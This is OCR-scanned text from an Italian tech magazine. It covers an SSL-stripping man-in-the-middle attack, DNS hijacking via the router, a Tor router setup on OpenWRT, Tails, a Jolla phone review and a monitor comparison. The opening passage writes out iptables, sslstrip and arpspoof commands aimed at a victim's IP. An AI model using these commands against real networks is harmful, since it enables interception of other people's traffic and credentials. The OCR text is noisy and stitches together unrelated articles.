dirottare i pacchetti che arrivano sulla porta 6000 (che otterrà 
dal server) sulla porta 80, in modo da farli avere alla vittima su 
una connessione HTTP: iptables -t nat -A PREROUTING -p 
tcp -destination-port 80 -j REDIRECT -to-port 6000. Fatto 
ciò, avvia ssIstrip per ricevere sulla porta 6000 i pacchet- 
ti che gli interessano: sslstrip -1 6000. A questo punto, su 
un altro Terminal Emulator (senza chiudere sslstrip) si pone 
come Man In The Middle con il-classico ARP spoof: arspoof 
«i eth0 -t 192.168.1.3 192.168.1.1 (dove 192.168.1.3 è la vittima 
e 192.168.1.1 il router). Ora il cracker deve soltanto avviare 
tecpdump, meglio se in ascolto sulla porta 6000 in modo da 
intercettare solo quello che vuole. 


DIROTTAMENTO DEI DNS 


Gli attacchi Man In The Middle “tradizionali” possono essere 
svolti finché il pirata si trova nella LAN della vittima. Ma esiste 
un trucco per continuare a essere un MITM anche a distanza. 
Ogni router ha dei server DNS predefiniti, attraverso i quali i 
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Fig. 2 - L'interfaccia Web del router ci permette di cambiare i DNS predefiniti 


PC della LAN riescono a tradurre i nomi dei siti Web in indirizzi 
IP realmente raggiungibili. | server DNS, quindi, possono leg- 
gere quasi tutto il nostro traffico sul Web e agire come dei veri 
Man In The Middle. Pertanto, se invece di passare da un DNS 
“ufficiale” (Google, Telecom, ecc.), il nostro traffico arriva a un 
server DNS realizzato dal pirata, è ovvio che potrà controllare 
tutto ciò che noi facciamo quando siamo connessi a Internet. 
E, se è entrato nella nostra LAN, il pirata non deve fare altro 
che aprire il pannello di controllo del router e sostituire i DNS 
di default con l’indirizzo del suo server. 


XIAOPAN SU VIRTUALBOX! 


Ecco come virtualizzare la distro 


Se siamo curiosi, possiamo provare Xiaopan anche su 
VirtualBox (www.virtualbox.org). Basta avviare la mac- 
china virtuale dall'immagine ISO di Xiaopan 0S PRO, 
scaricata da SourceForge. La macchina virtuale do- 
vrà obbligatoriamente avere l'accelerazione grafi- 

ca 3D abilitata. Inoltre, sarà opportuno collegare al 
computer un adattatore Wi-Fi USB (può andare bene 
anche uno dei classici modelli D-Link che si trova- 

no nei supermercati) e renderlo disponibile alla mac- 
china virtuale cliccando sul menu Dispositivi/USB. 

Le guest additions sono già presenti in Xiaopan PRO, 
quindi il sistema è già pronto per operare e mettere 
alla prova la nostra rete domestica. 


| 192.168.1.199 | 
| minutes (1-2880 minutes, the default value is 120) 
[19216811 (optional) 


‘ltoptional) 
‘ (optional) 
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SIAMO TUTTI SPIATI! 


L'NSA (l'Agenzia per la Sicurezza Nazionale degli USA) rac- 
coglie e analizza circa un TeraByte di dati ogni 3 secondi. 
La libreria del Congresso degli Stati Uniti, la più grande al 
mondo, un TeraByte ogni 6 giorni (518.400 secondi). Una 
quantità di dati impressionante di cui, fino all'anno scorso, 
non ne sapevamo nulla! Abbiamo cominciato a capire l’enti- 
tà di questo “programma di sorveglianza di massa” soltanto 
quando Edward Snowden, ex tecnico della CIA (ora rifugia- 
tosi in Russia), ha deciso di vuotare il sacco. Snowden ci ha 
fatto capire che tutti noi siamo controllati, non solo sulle reti 
telefoniche, ma anche sul Web. E ora, gli internauti si sento- 
no meno sicuri, più spiati. Non è un caso se le connessioni 
alla rete anonima Tor (www.torproject.org) hanno registra- 
to un'impennata considerevole in seguito allo scoppio del 
“Datagate" (www.edmaster.it/url/3769). A spiarci, però, non 
sono soltanto le agenzie governative. Partner gelosi, società 
di marketing, spammer, hacker...ciò che facciamo su Internet 
potrebbe suscitare l'interesse di molti “spioni”. Ecco perché 
abbiamo deciso di raccogliere le soluzioni hardware e sof- 
tware che ci consentono di renderci anonimi sul Web. Potre- 
mo così navigare e scaricare (a casa, in ufficio, sul PC di un 
amico o in un Internet Point) senza lasciare tracce! 


IL ROUTER DIVENTA ANONIMO 


Su un router commerciale non è possibile fare quasi nulla, 
figuriamoci installare e configurare un programma comples- 
so come Tor. Ma possiamo “liberare” il nostro dispositivo in- 
stallando su di esso un sistema operativo che ci consenta 
di avere il controllo assoluto (di fatto i router sono dei mini 
computer). Parliamo di OpenWRT, un potente firmware di- 
sponibile per moltissimi router: noi lo abbiamo installato su 
un Pirelli Gate (uno dei router distribuiti da Telecom Italia) e 
su un Technicolor TG788vn (distribuito, invece, da Fastweb); 
ma, come vedremo, esistono addirittura dei router sui quali 
viene preinstallato già dal produttore o dal venditore e altri 
sui quali è compatibile (dal sito Web di OpenWRT è possibile, 
come vedremo, consultare la lista di tutti i device perfetta- 
mente compatibili con il firmware). La procedura per installa- 
re OpenWRT su un router è abbastanza semplice e veloce, 
può svolta in meno di due minuti e tramite una comoda inter- 
faccia grafica. || primo passo, dunque, è davvero alla portata 
di tutti. Più complessa è invece la configurazione di Tor. Con- 
sigliamo, però, di effettuare questa modifica su router non più 
utilizzati sia per evitare danni permanenti che per scongiurare 
pericoli di malfunzionamenti: in alcuni casi infatti, potremmo 
non riuscire a sfruttare i VoIP forniti dal provider. 


ROUTER LOW-COST CON OPENWRT 


TP-LINK WR703N 
OpenWRT è già 
preinstallato 

e configurato. 


Le sue dimensioni pe 

estremamente E 

ridotte lo rendono ni enni 
GI PI: DN 


quasi tascabile. 
Quanto costa: 


€:32,56 

Sito Internet: 

www.edmaster.it/ WIDEMAC SL-R7205 
url/3776 Ha il grande van- 


taggio di supportare 
molte chiavette 3G 
ed essere predispo- 
sto per condividere 
la connessione 
mobile tramite Wi- 
Fi. 

Quanto costa: 

€ 47,80 

Sito Internet: 
www.edmaster.it/ 
url/3777 


PINEAPPLE MARK IV 

È basato su 
OpenWRT ma l'in- 
terfaccia web è stata 
ridisegnata con uno 
stile più “da hacker”. 
Quanto costa: € 


ARDUINO YUN 

Anche Arduino Yun, 
equipaggiato con una 
versione semplifi- 


50,00 cata di OpenWRT, 
Sito Internet: può essere utilizzato 
www.edmaster.it/ anche come router 
url/3778 e punto d'accesso 


Wi-Fi (www.edmaster. 
it/url/3779). Inoltre, 
la versione PoE [che 
costa circa 10 euro in 
é più)non ha bisogno 
i dialcun alimentato- 
È re,perché prende 

la corrente diretta- 
mente dal cavo 
Ethernet. 

Quanto costa: 

€ 52,00 

Sito Internet: 
http://store.arduino.cc 


Anonymous router per tutti! 


Il tuo router supporta OpenWRT? Installa Tor e naviga anonimo da qualsiasi PC della LAN! 


SCARICHIAMO L'ISO 

Accediamo all'interfaccia di configurazione del 

router: di solito, basta aprire il browser all'indirizzo 
192.168.1.1. Qui dobbiamo scoprire la marca e il modello esatto 
del router. Andiamo poi sul sito www.edmaster.it/url/3774 e cer- 
chiamo questo modello nell'elenco dei firmware disponibili. 


confirmation ero 


SSH Access 


Drecbear cftera giù netweri theli accesa and an intagratad STP server 


OPENWRT È GIÀ QUI 

Al riavvio (automatico) del router possiamo ac- 

cedere nuovamente all'interfaccia di configura- 
zione tramite l'indirizzo 192.168.1.1. Troviamo OpenWRT già 
pronto, e privo di chiave d'accesso. Per questo motivo, 
ci viene chiesto di inserire subito una password prima di 
proseguire. 


SERVONO | DRIVER WIFI 

Con la stessa procedura possiamo installare anche i 

driver della scheda Wi-Fi, che potrebbero non essere 
ancora attivi. Il pacchetto più completo è wpad. Ma può essere 
utile anche quello per le schede Atheros: kmod-ath9k. | diversi 
pacchetti driver non sono incompatibili tra loro. 
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IN LINGUA ITALIANA 

Trovato il firmware giusto [di solito è un file .bin, oppu- 
re .img) basta scaricarlo sul PC e poi inviarlo al router 
tramite l'apposita pagina. La maggioranza dei router, infatti, ha 
una pagina di “aggiornamento” del firmware: in essa è sufficien- 
te inserire il file .bin appena scaricato. 
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INSTALLIAMO TOR 

Dal pannello di configurazione spostiamoci 
nella scheda System/Software e premiamo Update 
List. Tramite la casella di ricerca, cerchiamo il pacchetto 
tor. Nella scheda Available packages comparirà un elenco di 
pacchetti, tra i quali proprio tor: per installarlo premia- 
mo Installe confermiamo con 0K. 
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Ilservizio Tor è disabilitato di default: per abilitarlo 

all'avvio del sistema operativo dobbiamo andare nella 
sezione System/Startup. Premiamo Disabled di fianco al servizio 
tor in modo che diventi Enabled e facciamo lo stesso con il servi- 
zio firewall. Le modifiche saranno effettive al riavvio del router. 
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È arrivato il momento di connetterci al router [da una 

qualsiasi macchina GNU/Linux presente nella rete 
locale] per procedere alla configurazione di Tor. Questa procedu- 
ra, però, non va fatta dall'interfaccia Web ma da riga di comando: 
ci affideremo dunque al protocollo SSH. 


Il nome utente è ovviamente root. Confermia- 

mo con Invio. Ci viene richiesta una password: 
è quella che abbiamo impostato in precedenza. Mentre 
digitiamo la password non comparirà alcun carattere: 
è una misura di sicurezza, dopo avere digitato la chiave 
premiamo Invio. 


La cosa più semplice è selezionare tutto il testo (da cat 

fino alla riga EOF) e premere Ctrl+C, spostarsi sul ter- 
minale e premere il tasto destro del mouse cliccando su Incolla. 
Dopo un semplice Invio il comando sarà stato eseguito e potremo 
passare al successivo, cioè cat « ‘EOF'> /etc/tor/torrc. 
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Se stiamo utilizzando Ubuntu, ad esempio, premiamo 

la combinazione di tasti Ctrl+Alt+T per accedere ad 
una finestra del terminale. Qui, lanciamo il comando ssh utenteld 
indirizzo, dove utente è la username per accedere al router e 
indirizzo è il suo IP. 


Lanciamo ora alcuni comandi per configurare 
il servizio di Tor: sono abbastanza lunghi, ma 
li possiamo copiare dal sito www.edmaster.it/url/3775. 
Scorriamo la pagina verso il basso: il primo comando da 
copiare è quello che inizia con cat«‘EOF'>/etc/config/wire- 
less e termina con EOF. 


Copiamo e incolliamo tutti i comandi fino quello che 

inizia con cat « ‘EOF’ » /etc/firewall.user e termina 
con il solito EOF. Quest'ultimo comando consente il dirottamento 
automatico di tutte le richieste Internet che arrivano al router 
verso Tor. Ora dobbiamo soltanto uscire scrivendo exit e riavvia- 
re il router. 


Naviga senza lasciare tracce! 


Installiamo Tails su una pendrive USB e scopriamo come navigare in pieno anonimo 


(O Appàcaticns Places: Syitem Gia + giù Se 


SUBITO ON-LINE 

Per ottenere l'anonimato sul Web, Tails utilizza Tor. 

Però è già tutto pronto all'uso: quando carichiamo il 
sistema operativo, basta aspettare qualche secondo affinché 
appaia il classico logo della cipolla nella barra delle icone in alto 
a destra nello schermo. 


Your IP: 
217.115.10.133 


IL MIO VERO IP? 

Tra i plug-in disponibili non è presente Flash 

Player, perché potrebbe essere sfruttato da ma- 
lintenzionati per scoprire il nostro vero indirizzo IP (una 
piccola accortezza che non tutti conoscono), Possiamo 
scoprire quale sia l'indirizzo che ci viene assegnato da 
Tor andando sul sito www.whatismyip.com. 
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RICERCHE LIBERE 

Grazie a Start Page otteniamo i risultati che normal- 

mente ci fornisce Google, ma con tutto l'anonimato 
che vogliamo e senza i filtri che polizia postale e provider 
pongono. Per fare un esempio, possiamo accedere a MEGA a 
prescindere da eventuali blocchi. 


> &/ Gobby Collaborative Editor (0.4) 
> &/ Gobby Collaborative Editor (0.5) 


DONNOLA DI GHIACCIO 

Il browser Web predisposto per l'uso con la rete 

anonima è IceWeasel. Lo troviamo in Applications/ 
Internet/Iceweasel Web Browser. Ha un'interfaccia spartana, 
ma contiene già i plug-in necessari a garantire la massima 
sicurezza possibile. 


start 
page è 
MOTORE DI RICERCA 


Fare tanta attenzione a mantenere l'anonimato 


e poi rivolgersi a Google come motore di ricerca 
{magari anche loggati con il nostro Google Account), 
potrebbe non essere una scelta intelligente. Per questo 
motivo il motore di ricerca predefinito in Tails è startpage. 
com, che non memorizza alcuna informazione. 


Warning! The web browser you are 
currently using is not anonymous! 


Tau are currentiy using e Unzafe Browser. As ts name suggests the Unsafe Browser's 
nermori acBvity ls not anonymous. if you mant a safe anonymous web browser, pienze 


ut iis browser down immediately and start the follomng web browser instead 
Applicabons — internet « irvmeasel 


SENZA ANONIMATO 


Ovviamente, con Tails non siamo obbligati a usare 

la rete Tor: possiamo anche avviare un browser 
non anonimo, Se dal menu di sistema Applications/Internet 
scegliamo il programma Unsafe Web Browser, appariremo sul 
Web con il nostro vero indirizzo IP. 


di Wa urta e 


Esci fuori dagli schemi! 


Più facile di Android, più bello di Windows Phone e più Open di tutti e 
due: questo è Sailfish 05, il nuovo sistema operativo mobile firmato Jolla 


'era una volta MeeGo, un progetto nato con lo scopo 

di fornire una piattaforma mobile rigorosamente Open 

Source e capace in un qualche modo di spodestare 
Android e i0S dalle loro comode poltrone. Un progetto for- 
se un po' troppo ambizioso a tal punto da creare spaccature 
all'interno del suo team di sviluppo dove accanto ad un'aper- 
ta Linux Foundation sedevano anche Intel, AMD e Nokia. In- 
teressi per ovvi motivi diversi e strategie aziendali diametral- 
mente opposte. Ed è così che Nokia, tutto d'un tratto, decise 
di sciogliere questo legame che l'univa alla Fondazione Linux 
per i motivi che noi oggi tutti conosciamo. Ma proprio quando 
per MeeGo sembrava essere finita, ecco arrivare degli angeli 
dal cielo: un gruppo di ex ingegneri di casa Nokia che dopo 
aver deciso di abbandonare l'azienda ormai in fase di acquisi- 
zione da parte di Microsoft, presero a cuore MeeGo, lo curaro- 
no e gli diedero nuova vita, battezzandolo con il nuovo nome 
in codice di Sailfish OS. A distanza di qualche anno, Jolla 
(è questo il nome della startup che si occupa dello sviluppo 
di Sailfish OS) presenta il suo primo smartphone. Un device 
dal potenziale tutto da scoprire e che, ovviamente, ospita il 


SENZIALE 


me screen 
di Sailfish 0S mostra 
l'orario corrente e l'ope- 
ratore di rete utilizzato 
{e, ovviamente, anche 

lo sfondo impostato 
dall'utente). Per visua- 
lizzare lo stato della rete 
o l'autonomia residua è 
necessario effettuare un 
doppio tap sullo schermo 
o un piccolo swipe verso 
il basso. Una home, dun- 
que, molto minimalista 
che può piacere o meno. 
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sistema operativo mobile nato dalle ceneri di MeeGo: eccoci 
di fronte al primo Jolla Phone. 


TUTTO A PORTATA DI SWIPE 


Certo che a chi da sempre si affida ad uno smartphone Android, 
premere il tasto di accensione e non vedere padroneggiare il 
logo di Google fa un po' paura. Ma, dopo qualche attimo di per- 
plessità e un paio di minuti di adattamento, tutto cambia. La pri- 
ma frase che balza nella mente di un amante di Android disprez- 
zatore di Windows Phone è: “quelli di Microsoft hanno davvero 
capito tutto”. Già, perché Sailfish OS dimostra a chi guarda il 
sistema operativo mobile di casa Microsoft con i prosciutti sugli 
occhi che lo swipe è davvero la chiave di svolta. È quel plus che 
ad Android manca ma che renderebbe davvero la vita più facile, 
senza rischiare di lussarsi un dito per spostarsi sulla diagonale 
di un ampio display. E questo plus l'ha introdotto (per la prima 
volta in un sistema operativo parzialmente Open) proprio Jolla. 
Ogni area dello schermo è buona per tornare indietro, consulta- 
re le notifiche ricevute o terminare un'app. 


? Per utilizza- 
importanti (di default, 
modulo telefonico, SMS, 
browser e fotocamera - 
ma l'utente può co- 
munque scegliere quali 
rendere predefinite) 
effettuiamo uno swipe 
verso il basso. In questa 
schermata vengono 
mostrate anche le app 
attualmente in esecuzio- 
ne sul device: il multi- 
tasking regna sovrano! 


NON TOCCATEGLI L'HARDWARE! 


Diamo un'occhiata alla dotazione hardware di questo “jolla- 
fonino”. Al suo interno batte il cuore di un processore Qual- 
comm Snapdragon da 1.4 GHz, un dual core al quale è stato 
affiancato un quantitativo di memoria RAM pari a 1 GB. A 
qualcuno possono sembrare un po' pochi e ciò perché, con 
ogni probabilità, si segue un'intuizione sbagliata. Già, perché 
il grande errore commesso dagli utenti è quello di comparare 
tali caratteristiche hardware a quelle di un device Android. 
Per noi linuxiani sarebbe un po' come sostenere che i requisiti 
minimi di Windows 8.1 (tanto per citarne uno) siano gli stessi 
di quelli di Ubuntu 14.10. Ogni sistema operativo, mobile o 
desktop che sia, ha la sua sete di risorse che, fortunatamen- 
te, cambia a seconda della piattaforma utilizzata. Così, come 
abbiamo avuto modo di appurare, un solo GB di memoria 
RAM consente al Jolla Phone di eseguire tutte le funzionalità 
di cui dispone senza mostrare la benché minima esitazione. 
Processore e RAM a parte, questo device è equipaggiato con 


un display da 4.5” con risoluzione di 960x540 pixel: ecco, 
qui ci saremmo aspettati davvero qualcosa in più ma al solo 
pensare che si tratta del primo telefonino prodotto da Jolla 
abbiamo in un qualche modo giustificato la startup finlande- 
se. Non mancano due fotocamere, una posteriore da 8 Me- 
gapixel con flash LED, ed una anteriore da 2 Megapixel uti- 
lizzabile per scattare centinaia di selfie o effettuare chiamate 
video. E poi ancora Wi-Fi b/g/n, Bluetooth 4.0, NFC, acce- 
lerometro, giroscopio, sensore di luce ambientale e supporto 
alle nuove reti 4G. In definitiva, il Jolla Phone non ha davvero 
nulla da invidiare (se non un sistema operativo con anni di 
sviluppo ormai alle spalle) ad uno smartphone di fascia me- 
dia Android. Non ha da invidiare neppure le app, considerato 
che la vera mossa furba di Jolla è stata quella di creare sì uno 
store per le app native Sailfish OS, ma di rendere comunque 
possibile l'installazione di qualsiasi APK nato originariamente 
per Android. L'unica nota negativa? Il prezzo: 299 euro sono 
forse un po' troppi per sradicare i preconcetti di molti utenti. 


Parola d'ordine: semplicità! 


Ecco come cambiare suoneria, sfondo e attivare nuove connessioni: è tutto davvero facile! 


IMPOSTAZIONI 

DI SISTEMA 

Effettuiamo due 
swipe verso il basso per 
vedere apparire il menu 
principale di Sailfish OS. 
Tappiamo su Impostazioni 
per accedere al menu di 
configurazione del device. 
Da qui, possiamo attivare le 
connessioni (36, 46 o Wi-Fi) 
o regolare luminosità dello 
schermo e il volume audio. 


ACCOUNT 

REGISTRATO! 

Con uno swipe 
verso sinistra, torniamo 
nel menu Impostazioni. Per 
poter accedere al Jolla 
Store è necessario dispor- 
re di un Account. Tappiamo 
quindi sull'omonima voce 
e, con uno swipe verso 
l'alto scegliamo Aggiungi 
account. Seguiamo la proce- 
dura guidata che ci porterà 
alla registrazione di un 
nuovo account gratuito. 


TUTTO IN 
02 unmenu 

Tocchiamo la voce 
Sistema: in questa scher- 
mata abbiamo la possibilità 
di settare le suonerie [per 
le chiamate e per gli SMS] 
da utilizzare come prede- 
finite, la sospensione del 
display o di configurare le 
varie connettività di rete 
(ad esempio, Wi-Fi, 3G/4G, 
Bluetooth e GPS). 


CAMBIAMO 
04 LosFonno 

Per terminare 
un'app effettuiamo uno 
swipe verso il basso a 
partire dall'estremo bordo 
superiore dell'interfaccia 
grafica. Spostiamoci in 
Galleria. Per impostare un 
nuovo sfondo, tappiamo 
sull'immagine scelta e 
con uno swipe verso l'alto 
optiamo per la voce Crea 
atmosfera: il nuovo sfondo è 
dunque attivo. 


A CONTI FATTI... 


Per tirare le nostre somme, abbiamo deciso di affidar- 
ci ad una citazione di Giorgio Faletti: “Nella vita ci sono 
cose che ti cerchi e altre che ti vengono a cercare. Non 
le hai scelte e nemmeno le vorresti, ma arrivano e dopo 
non sei più uguale. A quel punto le soluzioni sono due: 
o scappi cercando di lasciartele alle spalle o ti fermi e le 
affronti. Qualsiasi soluzione tu scelga, ti cambia, e tu hai 
solo la possibilità di scegliere se in bene o in male.” Beh, 
questo Jolla Phone, e più in particolare Sailfish OS, in 
un qualche modo ci cambia. Rivoluziona il nostro modo 
di approcciarsi ad uno smartphone andando ad agire su 
quelle piccolezze che mancano in Android. Con Sailfish 
OS, gli sviluppatori hanno saputo creare il giusto mix fra 
il sistema operativo di casa Google e quello di Microsoft, 
cogliendone di entrambi i reali pregi e mettendo da parte 
quei difetti che a molti non vanno giù. Un esempio? Per 
alcuni è assurdo come ancora oggi Android abbia la ne- 


“Android? Non mi manca!” 


cessità di tasti fisici o virtuali che siano e per altri, invece, 
l'idea di utilizzare un sistema operativo completamente 
proprietario (si legge Windows Phone) fa passare proprio 
la voglia di tecnologia. Sta di fatto che Sailfish OS, alme- 
no allo stato attuale, non può e non deve passare come 
la piattaforma mobile capace già da ora di abbattere il 
predominio Android. Ha ancora molta strada da fare. Ma 
ciò che ci rende sereni è il suo potenziale, che di cer- 
to non manca. ll suo ecosistema di app cresce giorno 
dopo giorno, così come con la stessa frequenza piccoli o 
grandi bug che siano vengono risolti da una comunità del 
tutto simile a quelle a cui noi tutti amanti di GNU/Linux ci 
approcciamo. Per ora, dunque, preferiamo guardare Sail- 
fish OS come un piacevole diverso che non fa paura, 
ma che riscalda gli animi degli amanti dell'Open Source. 
E, magari, fra qualche mese, saremo di nuovo qui ad af- 
fermare con vanto “noi ci credevano”. Oppure no. Solo il 
tempo potrà dare risposta. 


Oltre alle app presenti sul Jolla Store è possibile installare anche gli APK di Android 


JOLLA 
STORE 
Dopo aver settato 


il nostro account Jolla, dal 
menu principale di Sailfish 
OS tappiamo sulla voce Sto- 
re: allo stato attuale, le app 
native per il nuovo sistema 
mobile non sono poi così 
tante [per ovvi motivi legati 
all'anzianità dell'OS) ma, 
in compenso, sono tutte 
gratuite! 


«E APTOIDE! 
Oltre a Yandex, è 
possibile instal- 


lare tutti gli APK pubbli- 
cati anche su Aptoide, un 
altro store alternativo a 
quello ufficiale di Google 
e che gli utenti Android 
(specialmente i pirati) 
conoscono bene. Installia- 
molo dal Jolla Store: ef- 
fettuiamo uno swipe verso 
l'alto e scegliamo Cerca. 
Digitiamo quindi Aptoide e 
premiamo su Installa. 


in your Jolla 


PER GLI APK 
C'E YANDEX... 
Nella sezione 


Consigliata da Jolla tappiamo 
su Android support. Effettuia- 
mo un piccolo swipe verso 
l'alto e scegliamo Installa. 
Al termine del download 
Yandex (che ci permette di 
scaricare migliaia di APK 
gratuiti) sarà installata. 
Avviamo l'app e registriamo 
un nuovo account. 


INSTALLIAMO 
FACEBOOK 
Dopo aver ter- 


minato l'installazione di 
Aptoide, avviamo il softwa- 
re. L'interfaccia grafica è 
del tutto simile a quella 
del Play Store ufficiale 

di Google, Nel campo di 
ricerca, digitiamo facebo- 
ok e tappiamo su Installa 
per avviarne il download. 
Al termine, l'applicazione 
ufficiale del social network 
sarà pronta all'uso. 


1£ Facebook 
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Monitor da capogiro! 


Sotto i ferri 7 tra i migliori monitor WQHD/4K in circolazione. 
Qual è quello giusto per te? Scoprilo subito! 


principali da valutare quando si è pronti ad acqui- 

stare un nuovo monitor. La risoluzione, però, non 
è l’unico parametro da tenere in considerazione per ef- 
fettuare una buona scelta, anche perché bisogna tener 
conto dell’uso che poi se ne deve fare di un monitor. Per 
navigare e scrivere documenti di testo, ad esempio, non 
serve puntare su un monitor 4K, basta un buon Full HD. 
E proprio perché sappiamo che la scelta è complicata, 
abbiamo pensato di dare una mano a tutti i nostri lettori 
testando i migliori modelli attualmente in circolazione, fo- 
calizzando l'attenzione principalmente sulle nuove solu- 
zioni 4K disponibili in commercio. 


- ull HD, WQHD e 4K... sono queste le tre risoluzioni 


TANTI POLLICI, POCO PREZZO 


Gli attuali monitor da 24" (Full HD) hanno prezzi a partire 
da poco più di 100 euro, quindi risultano molto convenien- 
ti e tagliano fuori da un'eventuale scelta gli altri display 
con meno pollici. Di norma, queste dimensioni si rivelano 
perfette, dato che, con un monitor di quasi 61 centimetri 
di diagonale, l'utente potrà mantenere aperte agevolmen- 
te due finestre affiancate, che gli consentiranno di gestire 
fogli di lavoro e di tenere sott'occhio le e-mail in arrivo. 

I maxi monitor da 27 e 28 pollici offrono una diagonale di 
8-11 centimetri più ampia e si prestano bene all’elabora- 
zione delle foto o per computer grafica. Un monitor maxi 
occupa però molto spazio sul tavolo e va posizionato a 
una distanza adeguata: facciamo dunque anche i conti 
con lo spazio disponibile. Infatti, se l’utente si colloca da- 
vanti agli schermi WQHD e 4K a una distanza inferiore a 
80 centimetri, non avrà la possibilità di vedere tutta la foto 
con una nitidezza uniforme. 


NITIDEZZA A CONFRONTO 


Ma quanto sono nitide le immagini visualizzate dai moni- 
tor? Nel fare chiarezza su questo aspetto, i nostri tecnici 
hanno avuto varie sorprese. | dispositivi da 27 pollici testa- 
ti, ad esempio, grazie alla risoluzione WQHD, presentano 
un numero di pixel quasi doppio rispetto ai modelli Full HD, 
ma un monitor Viewsonic da 24 pollici (sempre Full HD), ha 
offerto maggior precisione di dettaglio e superiore fedeltà 
cromatica rispetto a tutti i dispositivi WQHD. | quattro mo- 
delli 4K hanno invece brillato per un’elevata nitidezza d’im- 
magine, ma solo i dispositivi di Philips e Samsung hanno 
offerto una riproduzione cromatica estremamente fedele. 


4K: ANCORA NON PER TUTTI! 


Chi vuol godere del potenziale dei monitor 4K, sia con giochi 
sia con video girati a questa risoluzione, in modo fluido niti- 
do, dovrà sborsare cifre di tutto rispetto. Dovendo elaborare 
ben 8.294.400 pixel, una GPU poco performante produrrà 
immagini scattose. Dato che una connessione tramite HDMI 
tende a rallentare il processore, si renderà necessario l’im- 
piego di un notebook di ultima generazione dal prezzo ele- 
vato, dotato di Displayport e di una potente scheda grafica. 


CONCLUSIONI 


Chi ha già un PC di ultima generazione dotato di Di- 
splayport e desidera disporre di un monitor maxi ultraniti- 
do, dovrebbe orientarsi verso il Philips 288P6 (496 euro). 
Questo elegante modello 4K visualizza foto e video con 
una nitidezza superiore a quella offerta dagli altri candida- 
ti al test, rivelandosi di gran lunga migliore tra tutti i moni- 
tor WQHD. E la sua dotazione è di tutto rispetto. 
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MONITOR 
27-28” WQHD/4K 


PREZZO 


INFO 


RISULTATI IN DETTAGLIO 
QUALITÀ DELL'IMMAGINE 


Fedeltà colori / Differenze sfumature grigio / | 


Riproduzione bianco (Temperatura colore) 


Luminosità max. / Valore del nero / | 


Rapporto di contrasto 
Diagonale schermo / superficie visibile / 


Densità pixel | 
Distribuzione luminosità (variazione max.) / | 
Variazione di luminosità nella visione laterale | 


Riflessi schermo / Comice schermo 


Test visivo: Qualità dell'immagine sull'ingresso | 
video digitale / ingresso analogico | 


‘(CON FILM D'AZIONE E GIOCHI: 


Precisione del dettaglio (Centro dell'immagine | 
/ Angolo dell'immagine) | 


PHILIPS 
288PGLIEB 


496 euro 


AOC 
U2868PQU 


497 euro 


L'AOC consente di visualizzare con estrema 
nitidezza le foto delle vacanze e i film 


Tra i 16 candidati, il Philips ha offerto la 
| migliore qualità d'immagine. L'unica critica 
riguarda il monitor, che potrebbe essere più | d'azione, ma non offre una fedeltà cromatica 


| luminoso. Nulla da obiettare sulla dotazione: 
| le numerose porte di connessione, l'hub USB 
\e la possibilità di potere gestire in parallelo 
| lettori Blu-ray e PC, rendono l'equipaggiamento 
| semplicemente straordinario. 

Display: TN, 27,91 pollici, 157,84 dpi; 


straordinaria. La dotazione è di prim'ordine. 
Analogamente al Philips, anche l'AOC presenta 
una porta MHL, che consente di trasferire sul 
monitor immagini e video dal tablet o dallo 
smartphone. 


Display: TN, 27,91 pollici, 157,84 dpi; 


Risoluzione: 3840 x 2160 (16:9) pixel; Risoluzione: 3840 x 2160 (16:9) pixel; 
Dimensioni (LxAxP): 65,9x43,0-58,1 Dimensioni (LxA x P): 65,8 x 44,0-55,4 
x27,1 cm x24,9 cm 


molto elevata (96,00%) / 
| molto elevata (95,40%) / elevata (94,90%) molto elevata (95,50%) 
elevata (86,50%) / un po' elevate (15,70%) | bassa (68,00%) / elevate (20,40,%) / 
/ molto naturale (6622 Kelvin) molto naturale (6563 Kelvin) 


un po'scarsa (262,50 cd/m2) / elevato 
(0,300 cd/m2) / un po' scarso (941:1) 

| ‘ampia (70,90 cm) / ampia (62,10x 34,10 
cm) / molto elevata (157,84 dpi) 


elevata (32,00%) / un pò elevata (47,00%) 


un po’ scarsa (267,10 cd/m2) / elevato 
(0,300 cd/m2) / un po' basso (927:1) 
ampia (70,90 cm) / ampia (62,05 x 34,10 
cm) / molto elevata (157,84 dpi) 
un po' elevata (24,40%) / 
un po' elevata (42,80%) 


bassi / bassi 


I bassi / molto bassi 


elevata (colori leggermente sbiaditi) / 
un po' bassa (colori leggermente sbiaditi) 


elevata (colori leggermente sbiaditi) / 
un po' scarsa (colori leggermente sbiaditi) 


SAMSUNG 
U28D590D 


544 euro 


La qualità d'immagine del Samsung può 
essere annoverata tra le migliori del test, ma 
lo stesso non vale purtroppo per la dotazione. 
l'utente non ha la possibilità né di regolare il 
monitor in altezza, né di orientarlo. Mancano 
inoltre speaker integrati, ingresso DVI o una 
porta VGA. Apprezzabile invece il ridotto 
consumo energetico per un modello 4K. 


Display: TN, 27,87 pollici, 158,06 dpi; 
Risoluzione: 3840 x 2160 (16:9) pixel; 
Dimensioni (LxAxP): 66x48,6x17 cm 


molto elevata (95,30%) / elevata (94,80%) 
elevata (90,%) / elevate (18,40%) / molto | 
naturale (6713 Kelvin) I 
elevata (351,10 cd/m2) / elevato (0,400 | 
cd/m2) /un po' basso (911:1) | 
ampia (70,80 cm) / ampia (62,10x34,10. | 
cm) / molto elevata (158,06 dpi) 

elevata (29,00%) / un po' elevata (40,73%) 

bassi / molto elevati 


elevata (colori leggermente sbiaditi) / 
non disponibile 


Tempo necessario refresh (medio / massimo) | 


Sfocatura nella riproduzione di immagini 


in movimento (media / massima) | 
È Ligonbi Di DI ‘CONFIGURAZIONE 


‘EDI POSIZIONAMENTO: 


strizoni per l'uso (Completezza, utilità) | 
Possibilità d'impostazione del dispositivo /| 
gestione del menu | 


Possibilità di regolazione per posizionamento 
monitor / Predisposizione per supporto 


DOTAZIONE 


Ingressi per segnale video / porte aggiuntive 
/ cavi di connessione in dotazione 


Componenti multimediali integrati: Speaker / | 


Microfono / Webcam 
Riproduzioni immagine (PiP / affiancate) 


1. .COSTO DI ESERCIZIO DEL MONITOR’ 


Consumo con monitor in funzione / all'anno 
(costo corrente elettrica) 


36 28 cannai0 2018 


a parete / Peso 


breve (16,1 ms) / un po' lungo (28,9 ms) molto breve (4,7 ms) / breve (16,9 ms) 


minima (17,0 ms) / 


| un po'elevata (29,3 ms) / elevata (43,1 ms) un po' elevata (26,2 ms) 


| solo istruzioni brevi non disponibili 


molto numerose / chiara e intuitiva numerose / un po' confusa 


molto numerose (angolo d’inclinazione, 
altezza, orientazione display, rotazione 

piedistallo) / si (Vesa 100 x 100 mm) / 
elevato (8,2 Kg) 


molto numerose ( angolo d’inclinazione, 
altezza, orientazione display, rotazione 

